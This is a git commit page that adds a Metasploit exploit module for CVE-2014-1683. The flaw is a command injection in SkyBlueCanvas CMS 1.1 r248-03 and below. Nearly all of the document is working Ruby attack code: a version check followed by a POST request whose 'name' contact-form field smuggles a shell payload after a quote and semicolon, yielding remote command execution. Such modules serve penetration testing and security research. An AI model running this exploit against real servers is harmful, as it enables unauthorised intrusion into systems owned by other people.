Land #2924, @xistence's exploit for CVE-2014-1683

2014-01-31 09:20:10 -06:00 · 2014-01-31 09:20:10 -06:00 · a010748056
parent 32c5d77ebd 710902dc56
commit a010748056
1 changed files with 94 additions and 0 deletions
--- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb
+++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb
@ -0,0 +1,94 @@
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'SkyBlueCanvas CMS Remote Code Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability
        in SkyBlueCanvas CMS version 1.1 r248-03 and below.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Scott Parish', # Vulnerability discovery and exploit
          'xistence <xistence[at]0x90.nl>' # Metasploit Module
        ],
      'References'     =>
        [
          ['CVE', '2014-1683'],
          ['OSVDB', '102586'],
          ['BID', '65129'],
          ['EDB', '31183'],
          ['URL', 'http://packetstormsecurity.com/files/124948/SkyBlueCanvas-CMS-1.1-r248-03-Command-Injection.html']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          # Arbitrary big number. The payload gets sent as an HTTP
          # response body, so really it's unlimited
          'Space'       => 262144, # 256k
          'DisableNops' => true,
          'Compat' =>
            {
              'ConnectionType' => 'find',
              'PayloadType'    => 'cmd',
              'RequiredCmd'    => 'generic perl ruby bash telnet python'
            }
        },
      'Platform'       => %w{ unix },
      'Targets'        =>
        [
          ['SkyBlueCanvas 1.1 r248', {}]
        ],
      'Arch'           => ARCH_CMD,
      'DisclosureDate' => 'Jan 28 2014',
      'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('TARGETURI',[true, "The path to the SkyBlueCanvas CMS installation", "/"]),
      ],self.class)
  end
  def check
    uri = normalize_uri(target_uri.path.to_s, "index.php")
    res = send_request_raw('uri' => uri)
    if res and res.body =~ /[1.1 r248]/
      vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found")
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end
  def exploit
    uri = normalize_uri(target_uri.path.to_s, "index.php")
    send_request_cgi({
      'method'  => 'POST',
      'uri'     => uri,
      'vars_get' => { 'pid' => '4' },
      'vars_post' =>
        {
          'cid' => '3',
          'name' => "#{rand_text_alphanumeric(10)}\";#{payload.encoded};",
          'email' => rand_text_alphanumeric(10),
          'subject' => rand_text_alphanumeric(10),
          'message' => rand_text_alphanumeric(10),
          'action' => 'Send'
        }
    })
  end
 end